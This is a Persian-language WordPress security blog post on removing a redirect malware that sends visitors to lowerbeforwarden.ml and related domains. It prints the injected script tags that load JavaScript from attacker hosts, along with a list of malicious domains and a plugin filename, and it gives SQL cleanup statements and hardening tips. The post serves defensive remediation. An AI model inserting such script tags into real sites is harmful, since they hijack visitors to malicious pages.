نحوه پاکسازی و حذف ویروس ریدایرکت به سایت lowerbeforwarden.ml در وردپرس

برخی ویروس یا بدافزارهایی در وردپرس وجود دارند که باعث ریدایرکت و منتقل شدن سایت به یک سایت دیگر مانند lowerbeforwarden.ml می شوند. در این پست میخواهیم این مشکل رو بررسی بکنیم و بعد به رفع آن بپردازیم.

lowerbeforwarden.ml فقط یک نمونه از این بدافزار ها است ، ما چند نمونه دیگر در زیر برای شما لیست کردیم که با یاد گیری این روش میتوانید تمامی این بدافزارها را از سایت وردپرسی خود پاک کنید.

  • نحوه پاکسازی و حذف ویروس و ریدایرکت به سایت lowerbeforwarden.ml در وردپرسsinistermousemove.art
  • donatelloflowfirstly.ga
  • js.donatelloflowfirstly.ga/statistics.js?n=ns1
  • scripts.lowerbeforwarden.ml
  • scripts. lowerbeforwarden.ml/src.js?n=ns1
  • source.l owerbeforwarden.ml
  • directednotconverted.ml
  • temp. lowerbeforwarden.ml/det.php
  • rms_unique_wp_mu_pl_fl_nm.php
  • location. lowerbeforwarden.ml
  • solo.declarebusinessgroup.ga
  • trendopportunityfollow.ga
  • mono.declarebusinessgroup.ga

آموزش حذف ویروس lowerbeforwarden.ml از سایت وردپرسی

اگر وبسایت شما بازدیدکنندگان را به برخی صفحات دیگر و وبسایت های دیگر منتقل میکند این ویروس در سایت شما وجود دارد و در حال حاضر سایت شما مورد نفوذ قرار گرفته است.

دلایل هک و آلوده شدن سایت به این نوع ویروس

  • قالب و افزونه های شما از منابع معتبر دانلود و آپدیت نشده اند.
  • نسخه وردپرس سایت قدیمی است و بروزرسانی نمی شود.
  • از رمز عبور ساده برای پیشخوان وردپرس و هاست خود استفاده کرده اید.
  • قابلیت xmlrpc در سایتتان فعال است
  • صفحه ورود به پیشخوان وردپرس خود را تغییر نداده اید.
  • به صورت مداوم نظرات هرزنامه و جفنگ را تایید میکنید.

آماده باشید که کاری پیچیده و دشوار برای پاکسازی سایت از این ویروس پیش رو داریم …

ممکن است اسکریپت های زیر را در صفحات سایت خود دیده باشید :

<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>
<script src='https://js.donatelloflowfirstly.ga/statistics.js?n=ns1' type='text/javascript'></script>
<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>

یا نسخه رمزگذاری شده این ویروس به اینصورت است :

نسخه رمزگذاری شدهرفع مشکل ریدایرت به سایت lowerbeforwarden.ml در وردپرس

مراحل رفع بدافزار lowerbeforwarden.ml

نکته : قبل از هرکاری از سایت خود یک فول بک آپ تهیه نمایید و بعد مراحل زیر را دنبال کنید.

مرحله 1 : تمامی فایل هایی که با _a یا _f و … را از Home Directory هاست خود پاک کنید.

مرحله 2 : به پوشه wp-content و plugins بروید و اگر پوشه ای با نام Mu-Plugins وجود داشت و همچنین فایلهای مخرب rms_unique_wp_mu_pl_fl_nm.php را پاک کنید.

حذف ویرویس lowerbeforwarden.ml در وردپرس

مرحله 3 : به phpmyadmin بروید و جدول wp_posts را انتخاب نمایید سپس در تب sql کدهای زیر را اجرا نمایید :

UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://scripts. lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", ""));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://location. lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", ""));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://temp. lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", ""));

طبیعتا برای شما سوال پیش آمده که این کد چیست و چرا باید اینکار را انجام دهید ، این کد اسکریپت هایی را که توسط ویروس در پست ها و برگه های سایت شما جاگذاری شده را بصورت یکجا حذف میکند.

به تصویر زیر که یکی از برگه های سایت است نگاهی بیاندازید ، این اسکریپ که توسط ویروس در برگه جاگذاری شده است و باعث ریدایرکت شدن سایت به یک سایت دیگر می شود را میتوانید ببینید.

رفع مشکل ریدایرت به سایت lowerbeforwarden.ml در وردپرس

حال اگر بخواهید این کد را از تمام برگه ها و نوشته های خود پاک کنید طبیعتا زمان بر خواهد بود که با اجرای کد فوق اینکار بصورت یکجا انجام می شود.

مرحله 4 : حالا به جدول wp_options بروید و صفحات خانه سایت را بررسی نمایید که مطمئن شوید دستکاری نشده است.

در قسمت siteurl و home باید آدرس سایت خود را مشاهده نمایید ، در غیر اینصورت این دو قسمت را ویرایش نمایید.

مشکل رفتن به سایت lowerbeforwarden.ml در وردپرس

مرحله 5 : لیستی از افزونه های سایت خود تهیه کنید و بعد تمام آنها را حذف نمایید و بعد نسخه اورجینال آنها را نصب نمایید.

توجه : تنظیمات افزونه های با حذف پوشه آنها از بین نخواهد رفت چون تنظیمات در دیتابیس سایت ذخیره شده اند.

مرحله 6 : روند مرحله 5 را هم برای themes های سایت خود اجرا نمایید.

مرحله 7 : تمامی فایلهای index.php موجود در هاست را بررسی نمایید که حاوی اسکریپت های مخرب که در مراحل قبل معرفی شدند نباشند.

نکاتی برای داشتن امنیت بیشتر

به دلیل وجود درب های پشتی و دیگر موارد ضعف امنیتی هر سایتی ممکن است مورد نفوذ قرار بگیرد و این امری اجتناب ناپذیر در فضای وب می باشد. اما میتوانید با رعایت نکاتی از این اتفاق تا حد بالایی جلوگیری نمایید ، اما در کل برای داشتن امنیت در وردپرس حتما :

  • از افزونه و قالب های اورجینال استفاده نمایید
  • سرور و هاست با امنیت بالا را انتخاب نمایید
  • وردپرس ، افزونه و قالب خود را همیشه به روز نگه دارید
  • صفحه ورود به پیشخوان وردپرس را تغییر دهید
  • دسترسی xmlrpc را غیر فعال نمایید
  • از افزونه امنیتی wordfence استفاده کنید
  • از سایت خود بک آپ تهیه نمایید

سخن آخر

این مراحل کلی برای رفع این نوع ویروس ها بود ، اما شاید بسته به نوع ویروس شاید نیاز باشد که کارهای دیگری را هم انجام دهید که این روند نیازمند تیم تخصصی طراحی سایت است که شما میتوانید این امر را به رایکا وب که تجربه مناسبی در زمینه های مختلف اعم از پشتیبانی و امنیت سایت ، برنامه نویسی اختصاصی دارد بسپارید.

وبلاگ

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *